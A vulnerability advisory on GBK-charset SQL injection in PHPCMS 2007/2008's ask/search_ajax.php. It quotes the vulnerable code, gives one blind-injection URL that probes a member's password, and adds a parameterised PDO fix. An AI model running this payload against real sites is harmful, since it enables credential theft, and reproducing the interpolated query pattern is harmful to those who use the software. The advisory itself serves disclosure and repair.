Affected versions:
phpcms 2008 GBK
phpcms 2007 GBK
Vulnerability description:
PHPCMS is a leading website management system in China and also an open-source PHP development framework.
Vulnerable file: ask/search_ajax.php
code:
<?php
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
// $q is not defined in this file; it arrives from the request via common.inc.php.
// On a non-UTF-8 site (GBK on the affected versions) it is converted to UTF-8 here.
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
    // The converted value is interpolated directly into the LIKE clause.
    $where = " title LIKE '%$q%' AND status = 5";
}
else
{
    exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val)
{
    $val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
    $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
    $info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
<*Reference
ssvdb
*>
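Test method:
The programs (methods) provided by this site may be offensive in nature and are intended for security research and teaching only; use at your own risk!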
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
Security recommendation:
Refer to the official patch.
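As an added illustration (not the official patch and not PHPCMS code), here is the search from ask/search_ajax.php rewritten so that charset conversion runs on the raw request value and the search term is bound as a parameter instead of being interpolated. The `search_titles` function, the `ask` table layout and the sample rows are assumptions made for this example, which uses an in-memory SQLite database through PDO so it runs offline.

```php
<?php
// Added example, not PHPCMS code and not the vendor patch.
// Assumptions: search_titles(), the "ask" table layout and the rows are constructed.

function search_titles(PDO $db, string $rawQ, string $charset): array
{
    // Convert the raw request value first. Escaping applied before a charset
    // conversion can be altered by it, so nothing is escaped ahead of this step.
    $q = $rawQ;
    if (strtolower($charset) !== 'utf-8') {
        $q = @iconv($charset, 'utf-8', $rawQ);   // false on an invalid byte sequence
        if ($q === false) {
            return [];                            // reject malformed input outright
        }
    }
    if ($q === '') {
        return [];
    }

    // Escape LIKE wildcards so the term is matched literally.
    $like = '%' . strtr($q, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';

    // The value is bound, never interpolated, so quotes in it stay data.
    $stmt = $db->prepare(
        "SELECT askid, title FROM ask
          WHERE title LIKE :q ESCAPE '!' AND status = 5
          ORDER BY askid DESC LIMIT 10"
    );
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ask (askid INTEGER PRIMARY KEY, title TEXT, status INTEGER)');
$db->exec("INSERT INTO ask (title, status) VALUES
           ('how to install', 5), ('unapproved draft', 1), ('100% uptime', 5)");

// Constructed inputs: a normal term, a term with a quote and SQL keywords,
// a wildcard, and a byte sequence that is not valid GBK.
$inputs = ['install', "x' OR '1'='1", '%', "s\xE6'"];
foreach ($inputs as $in) {
    $rows = search_titles($db, $in, 'GBK');
    printf("%-16s => %d row(s)\n", json_encode($in, JSON_INVALID_UTF8_SUBSTITUTE), count($rows));
}
```

On a MySQL deployment the connection charset should also be set explicitly (for example through the `charset` parameter of the PDO DSN) so that client and server agree on the encoding.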